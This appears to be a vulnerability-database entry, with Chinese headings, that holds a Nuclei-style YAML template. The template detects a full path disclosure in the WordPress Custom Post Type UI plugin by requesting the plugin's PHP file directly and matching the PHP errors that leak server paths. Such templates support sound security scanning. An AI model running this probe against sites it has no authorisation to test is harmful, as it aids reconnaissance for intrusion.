漏洞描述
Detected WordPress Custom Post Type UI exposes internal file system path through direct file access.
wp-custom-post-type-ui-fpd: WordPress Custom Post Type UI - Full Path Disclosure
PoC代码[已公开]
id: wp-custom-post-type-ui-fpd
info:
name: WordPress Custom Post Type UI - Full Path Disclosure
author: 0x_Akoko
severity: low
description: |
Detected WordPress Custom Post Type UI exposes internal file system path through direct file access.
reference:
- https://wordpress.org/plugins/custom-post-type-ui/
- https://github.com/WebDevStudios/custom-post-type-ui
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cwe-id: CWE-200
metadata:
max-request: 1
verified: true
tags: wordpress,fpd,wp-plugin,custom-post-type-ui,exposure
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/custom-post-type-ui/custom-post-type-ui.php"
matchers:
- type: dsl
dsl:
- 'status_code == 200 || status_code == 500'
- 'contains(body, "plugins/custom-post-type-ui/")'
- 'contains_all(body, "Fatal error", "Call to undefined function") || contains_all(body, "Warning:", "failed to open stream")'
condition: and
# digest: 4a0a00473045022100f250e750d7c564ebaee198c3e24f4fd623fa8d7778c587d25c06caf70cea304f022008ba5b5189e374cdc9a6301b65de83096f277c38f6a366abd1583f5d0e80b161:922c64590222798bb761d5b6d8e72950